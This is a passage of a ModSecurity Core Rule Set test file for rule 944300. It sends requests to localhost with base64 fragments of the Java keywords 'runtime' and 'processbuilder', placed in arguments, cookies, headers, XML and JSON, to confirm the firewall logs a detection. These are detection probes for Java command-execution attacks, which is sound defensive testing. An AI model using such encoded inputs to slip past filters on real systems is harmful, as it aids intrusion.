"HTTP/1.0" - data: "test=HJ1bnRpbWU" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-20 - desc: "Content-Type application/json arg value includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HJ1bnRpbWU\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-21 - desc: "Content-Type application/json arg name includes keyword HJ1bnRpbWU" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HJ1bnRpbWU\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-22 - desc: "Argument test includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-23 - desc: "Argument name includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "BydW50aW1l=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-24 - desc: "Cookie test includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=BydW50aW1l - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-25 - desc: "Cookie name includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: BydW50aW1l=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-26 - desc: "Request header test includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: BydW50aW1l - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-27 - desc: "XML attribute value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-28 - desc: "XML element value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-29 - desc: "Nested XML element value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-30 - desc: "Content-Type text/plain includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=BydW50aW1l" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-31 - desc: "Content-Type application/json arg value includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"BydW50aW1l\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-32 - desc: "Content-Type application/json arg name includes keyword BydW50aW1l" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"BydW50aW1l\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-33 - desc: "Argument test includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-34 - desc: "Argument name includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-35 - desc: "Cookie test includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=cHJvY2Vzc2J1aWxkZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-36 - desc: "Cookie name includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: cHJvY2Vzc2J1aWxkZXI=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-37 - desc: "Request header test includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: cHJvY2Vzc2J1aWxkZXI - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-38 - desc: "XML attribute value includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-39 - desc: "XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-40 - desc: "Nested XML element value includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-41 - desc: "Content-Type text/plain includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=cHJvY2Vzc2J1aWxkZXI" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-42 - desc: "Content-Type application/json arg value includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"cHJvY2Vzc2J1aWxkZXI\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-43 - desc: "Content-Type application/json arg name includes keyword cHJvY2Vzc2J1aWxkZXI" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"cHJvY2Vzc2J1aWxkZXI\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-44 - desc: "Argument test includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-45 - desc: "Argument name includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-46 - desc: "Cookie test includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=HByb2Nlc3NidWlsZGVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-47 - desc: "Cookie name includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: HByb2Nlc3NidWlsZGVy=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-48 - desc: "Request header test includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: HByb2Nlc3NidWlsZGVy - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-49 - desc: "XML attribute value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-50 - desc: "XML element value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-51 - desc: "Nested XML element value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-52 - desc: "Content-Type text/plain includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=HByb2Nlc3NidWlsZGVy" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-53 - desc: "Content-Type application/json arg value includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"test\": \"HByb2Nlc3NidWlsZGVy\"}" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-54 - desc: "Content-Type application/json arg name includes keyword HByb2Nlc3NidWlsZGVy" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - version: "HTTP/1.0" - data: "{\"HByb2Nlc3NidWlsZGVy\": \"test\"}" - output: - log_contains: "id \"944300\"" - - - test_title: 944300-55 - desc: "Argument test includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-56 - desc: "Argument name includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg=test" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-57 - desc: "Cookie test includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=Bwcm9jZXNzYnVpbGRlcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-58 - desc: "Cookie name includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: Bwcm9jZXNzYnVpbGRlcg=test - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-59 - desc: "Request header test includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: Bwcm9jZXNzYnVpbGRlcg - method: "POST" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-60 - desc: "XML attribute value includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-61 - desc: "XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-62 - desc: "Nested XML element value includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - version: "HTTP/1.0" - data: "Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-63 - desc: "Content-Type text/plain includes keyword Bwcm9jZXNzYnVpbGRlcg" - stages: - - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "ModSecurity CRS 3 Tests" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Charset: "ISO-8859-1,utf-8;q=0.7,*;q=0.7" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - version: "HTTP/1.0" - data: "test=Bwcm9jZXNzYnVpbGRlcg" - output: - log_contains: "id \"944300\"" - - - - test_title: 944300-64 - desc: "Content-Type application/json arg value includes keyword 